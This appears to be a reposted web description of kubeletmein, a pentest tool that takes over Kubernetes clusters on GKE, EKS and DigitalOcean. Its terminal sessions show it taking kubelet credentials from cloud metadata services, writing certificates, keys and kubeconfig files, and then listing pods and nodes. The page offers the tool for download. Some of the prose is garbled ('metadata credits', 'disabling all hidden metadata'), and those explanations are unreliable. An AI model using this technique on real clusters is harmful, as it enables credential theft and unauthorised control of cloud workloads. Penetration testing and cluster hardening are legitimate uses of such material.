kubeletmein is a simple pentest tool that exploits cloud threats in a Kubernetes cluster to access the k8s API.
This access can be used to further control applications running in the cloud or in many other cases, facilitating complete control of Kubernetes.
Supported providers and use
G.K.E.
The GKE ( Google Kubernetes Engine) is fully supported and based on disabling all hidden metadata.
root@kubeletmein-vulnerable:/# kubeletmein generate 2021-03-04T22:25:52Z [ℹ] fetching kubelet creds from metadata service 2021-03-04T22:25:52Z [ℹ] writing ca cert to: ca-CERTIFICATES.crt 2021-03-04T22:25:52Z [ℹ] writing kubelet cert to: kubelet.crt 2021-03-04T22:25:52Z [ℹ] writing kubelet key to: kubelet.key 2021-03-04T22:25:52Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig 2021-03-04T22:25:52Z [ℹ] wrote bootstrap-kubeconfig 2021-03-04T22:25:52Z [ℹ] using bootstrap-config to request new cert for node: kubeletmein-node 2021-03-04T22:25:53Z [ℹ] got new cert and wrote kubeconfig 2021-03-04T22:25:53Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get pods NAME READY STATUS RESTARTS AGE kubeletmein-vulnerable 1/1 Running 0 12m root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get nodes NAME STATUS ROLES AGE VERSION gke-kubeletmein-kubeletmein-vulnerabl-6623dbee-mgkd Ready11m v1.18.12-gke.1210
EKS
Support for Amazon Elastic Kubernetes Service was originally added by @ airman604 based on startup script AWS EKS. This has been extended to provide support for various types of user data encountered in EKS.
Specifically, it will support cloud-config formats and shell script. In the latter case, the program tries to parse the /etc/eks/bootstrap.sh command line arguments and retrieve the values it needs from there.
~ $ kubeletmein generate 2021-03-02T21:37:59Z [ℹ] running autodetect 2021-03-02T21:37:59Z [ℹ] EKS detected 2021-03-02T21:37:59Z [ℹ] fetching cluster information from user-data from the metadata service 2021-03-02T21:37:59Z [ℹ] getting IMDSv2 token 2021-03-02T21:37:59Z [ℹ] getting user-data 2021-03-02T21:37:59Z [ℹ ] generating EKS node kubeconfig file at: kubeconfig 2021-03-02T21:37:59Z [ℹ ] wrote kubeconfig 2021-03-02T21:37:59Z [ℹ ] then try: kubectl --kubeconfig kubeconfig get pods
Digital Ocean
Supported by default, DO provides metadata credits and this cannot be disabled.
root @ kubeletmein-vulnerable: / # kubeletmein generate 2021-03-04T23: 39: 46Z [ℹ] running autodetect 2021-03-04T23: 39: 46Z [ℹ] DigitalOcean detected 2021-03-04T23: 39: 46Z [ℹ] fetching kubelet creds from metadata service 2021-03-04T23: 39: 46Z [ℹ] writing ca cert to: ca-certificates.crt 2021-03-04T23: 39: 46Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig 2021-03-04T23: 39: 46Z [ℹ] wrote bootstrap-kubeconfig 2021-03-04T23: 39: 46Z [ℹ] using bootstrap-config to request new cert for node: kubeletmein-node 2021-03-04T23: 39: 46Z [ℹ] got new cert and wrote kubeconfig 2021-03-04T23: 39: 46Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods root @ kubeletmein-vulnerable: / # kubectl --kubeconfig kubeconfig get pods NAME READY STATUS RESTARTS AGE kubeletmein-vulnerable 1/1 Running 0 6m12s
You can download the program from here.